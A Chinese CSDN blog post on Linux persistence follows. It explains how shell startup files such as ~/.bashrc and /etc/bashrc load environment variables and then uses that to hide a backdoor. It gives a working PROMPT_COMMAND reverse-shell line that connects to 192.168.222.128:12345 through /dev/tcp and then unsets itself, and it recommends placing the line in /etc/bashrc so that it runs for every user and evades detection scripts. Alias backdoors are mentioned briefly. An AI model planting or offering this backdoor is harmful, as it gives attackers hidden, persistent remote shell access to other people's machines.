Linux环境变量配合权限维持手法

已于 2023-06-13 00:51:58 修改
阅读量480 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux 运维 服务器
于 2023-06-13 00:47:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/131178666
版权

前言:

权限维持的时候有其中有两种,一种是alias别名、第二种是prompt_command,这里我们可以将其添加到环境变量中,每次运行的时候都可以使用,从而达到权限控制的效果,而不是临时执行的效果。

环境变量:

这里有其中环境变量添加的方法

第一种:

export  PATH=""
读取环境变量的方法:

export命令显示当前系统定义的所有环境变量
echo $PATH命令输出当前的PATH环境变量的值

第二种:

vim ~/.bashrc
# 在最后一行加上
export PROMPT_COMMAND="(0<&196;exec 196<>/dev/tcp/192.168.222.128/12345; sh <&196 >&196 2>&196 &) 2> /dev/null;unset PROMPT_COMMAND"

注意事项:

  • 生效时间:使用相同的用户打开新的终端时生效,或者手动source ~/.bashrc生效
  • 生效期限:永久有效
  • 生效范围:仅对当前用户有效
  • 如果有后续的环境变量加载文件覆盖了PATH定义,则可能不生效

第三种:

vim ~/.bash_profile

注意事项:

  • 生效时间:使用相同的用户打开新的终端时生效,或者手动source ~/.bash_profile生效
  • 生效期限:永久有效
  • 生效范围:仅对当前用户有效
  • 如果没有~/.bash_profile文件,则可以编辑~/.profile文件或者新建一个

方法四:

vim /etc/bashrc

注意事项:

  • 生效时间:新开终端生效,或者手动source /etc/bashrc生效
  • 生效期限:永久有效
  • 生效范围:对所有用户有效

方法五:

vim /etc/profile

注意事项:

  • 生效时间:新开终端生效,或者手动source /etc/profile生效
  • 生效期限:永久有效
  • 生效范围:对所有用户有效

方法六:

vim /etc/environment

注意事项:

  • 生效时间:新开终端生效,或者手动source /etc/environment生效
  • 生效期限:永久有效
  • 生效范围:对所有用户有效

配合权限维持使用:

PROMPT_COMMAND后门

这条指令是经过了想了好久才想出来的指令,相当的牛逼很有好的隐蔽性

export PROMPT_COMMAND="(命令 &) 2> /dev/null;unset PROMPT_COMMAND"

命令讲解:

命令  &:这是将这条命令后台执行

(命令 &) 2> /dev/null:这里括起开是让里面执行完,将错误不输出在控制台上

unset  PROMPT_COMMAND:这里执行完就删掉

效果:

每次打开终端就会连接上,然后连接完后就会删除,这里可以绕过一些检测的脚本

依据上面将的环境变量,我们可以将其写到/etc/bashrc中,因为这对所有用户都有效的,而且永久有效,打开终端执行。

当我们使用export查看的时候发现是不存在的

alias后门

这里可以使用别名,我们照样可以写到这些环境变量中,然后我们打开终端这些别名自动生效。

参考文章:

https://www.cnblogs.com/youyoui/p/10680329.html

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux权限环境变量
weixin_45936641的博客
08-31 666
Linux /etc/profile 概述: linux /etc/profile文件的改变会涉及到系统的环境,也就是有关Linux环境变量的东西 Linux是一个多用户的操作系统。每个用户登录系统后,都会有一个专用的运行环境。通常每个用户默认的环境都是相同的,这个默认环境实际上就是一组环境变量的定义。用户可以对自己的运行环境进行定制,其方法就是修改相应的系统环境变量 在/etc/profile文件中修改环境变量,在这里修改的内容是对所有用户起作用的 如何添加环境变量: 例如添加”NAME=aa“ 。在pr
解决方案:使用Vscode运行命令时,.出现 __vsc_prompt_cmd_original: command not found
qq_44949985的博客
02-06 4136
解决方案:使用Vscode运行命令时,.出现 __vsc_prompt_cmd_original: command not found
Linux使用PROMPT_COMMAND环境变量记录用户操作日志
Blue summer的博客
12-18 1万+
注:本文基于CentOS 6.5 编写 1、关于PROMPT_COMMAND环境变量 Bash在显示PS1之前先执行PROMPT_COMMAND定义的内容,而PS1也就是linux的命令提示符,关于PS1详细设置可参考:Linux 提示符后面显示全路径。 我们可以先感受一下PROMPT_COMMAND的功能效果,如果要显示命令执行的时间,可以如下操作。 [root@CentOS-6-5 /]# e...
解决Centos 7 下终端窗口显示“]777;notify;Command completed;exit[”
梅子微酸 - - CSDN博客
10-23 3895
【问题】     centos 7 系统更新后(yum update),终端里用户名前面显示]777;notify;Command completed;exit[。并且我每输入一条命令,终端里用户名前面的内容就会变化。详见下图 图1. 终端的用户名前显示历史命令 【解决办法】     一时没有找到出问题的原因,后续知道后再记录吧。     先说解决办法: 修改bash的配置文件,在文件...
Linux之shell 变量
heiiochange的博客
11-08 249
shell执行方式 执行1:sh xx.sh 执行2:bash xx.sh 执行3:需要先给文件赋予执行权限。再使用文件路径路径执行 aa.sh脚本内容: [damo@future shelldemo]$ cat aa.sh #!/bin/bash echo "========================" 执行方式1: [damo@future shelldemo]$ ll -rw-r--r--. 1 damo shaolin 45 11月 8 20:21 aa.sh [damo@fut
Linux用户环境变量、系统环境变量和PATH变量
pink_shen的博客
04-15 2017
usr/bin与/usr/sbin的区别:sbin里存放的是超级用户root才能执行的程序, bin里存放的是普通用户执行的程序。/use/local/bin 与/use/bin的区别:没有local是系统自带程序文件夹,加了local是用户安装的程序文件夹。我们访问root用户才能操作的useradd命令, 发现这个命令就存放在系统自带的root用户文件夹里,也就是/usr/sbin。对当前用户有效的变量,都定义在 ~/.profile (在Linux系统中 以.开头的为隐藏文件)
LINUX提权之环境变量提权篇
weixin_57543652的博客
01-11 832
上一篇文章给大家介绍了linux中的内核提权的一些知识点不知道大家学的怎么样了,今天给大家带来一个全新的提权方法——"环境变量提权",本文会介绍关于环境变量提权的基本知识以及利用方法。今天给大家带来了环境变量提权比较简单的方法不知道大家听明白了没有,环境变量提权中比较重要的就是结合suid权限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。「金石计划 . 瓜分6万现金大奖」
Linux系统环境变量
01-19
这涉及到环境变量 PATH 的设置问题,而 PATH 的设置也是在 linux 下定制环境变量的一个组成部分。本文基于 RedHat 9.0 ,详细讲解了环境变量定制的问题。  2、变量简介  Linux 是一个多用户的操作系统。每个用户...
判断Linux Shell环境变量是否存在
09-15
主要介绍了Linux Shell 判断环境变量是否存在的方法,非常不错,具有参考借鉴价值,需要的朋友可以参考下
自定义添加linux系统java环境变量脚本及安装包
06-23
各位小伙伴肯定都遇到过拿到一个linux环境发现没有java环境,又需要屁颠屁颠跑去找java安装包配置环境变量的问题吧? 本资源为二狗自己编写的快速定义java环境变量的脚本,可以帮助你剩下不少时间,操作前建议备份/...
Linux 环境变量详解及实例
01-20
Linux环境变量 ~/.bash_profile && ~/.bashrc 用户登陆Linux操作系统的时候,”/etc/profile”, “~/.bash_profile”等配置文件会被自动执行。 执行过程是这样的: 登陆Linux系统时,首先启动”/etc/profile”,...
完美介绍linux环境变量与部分命令
09-15
有时候在操作linux过程中,自己都不清楚有些变量是什么,也不清楚如何查看,下面在这里写一篇关于环境变量和部分命令的文章。
收集 Linux 命令行执行的命令
weixin_34159110的博客
05-01 420
本篇文章的目的为收集在命令行执行的所有命令,除了将所有的命令发送到 Elasticsearch 进行保存之外,还需要为敏感命令做告警。 要做到这些的核心在于 PROMPT_COMMAND 这个环境变量,它的作用是,在出现 shell 命令输入提示符之前,作为命令来执行这个变量。 因此,我们可以将这个变量定义为一个命令,然后看看它的效果: # export PROMPT_COMMAND="date ...
Linux 利用 PROMPT_COMMAND 实现审计功能
热门推荐
bwlab的博客
05-05 1万+
linux历史命令记录在history,在用户退出的时候写入,不过有时候可以直接绕过去,不让写入,比如shutdown now,还有在一些情况下也是不予保存的,这让人很头疼 使用PROMPT_COMMAND可以在用户输入一条命令,就直接记录,export HISTORY_FILE=/var/log/history/`date '+%Y-%m-%d'`.log export PROMPT_COMMA
BASH脚本基础:环境变量PROMPT_COMMAND介绍
知行合一 止于至善
01-30 1万+
PS1-PS4介绍了一些用于提示信息控制的环境变量,而在此之前可以进行回调的一个环境变量就是PROMPT_COMMAND,这个环境变量中设定的内容将在交互式脚本的提示(PS1)出现之前被执行。
linux下利用PROMPT_COMMAND环境变量记录用户操作历史
大神带我来搬砖
11-05 2007
在bash里设置环境变量PROMPT_COMMAND,这个命令会在用户提示符之前被执行,可以用来记录用户操作历史 [quote]PROMPT_COMMAND If set, the value is executed as a command prior to issuing each primary prompt.[/quote] 为了防止用户覆盖PROMP...
linux---进程通信
最新发布
m0_74979625的博客
05-17 554
提示:以下是本篇文章正文内容,下面案例可供参考。
linux 环境变量默认
09-13
Linux 环境变量的默认值是根据不同的发行版和安装配置而有所不同。通常,Linux 系统在安装时会预设一些默认的环境变量。下面是一些常见的默认环境变量: 1. PATH:包含了可执行程序的路径。默认情况下,系统会将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值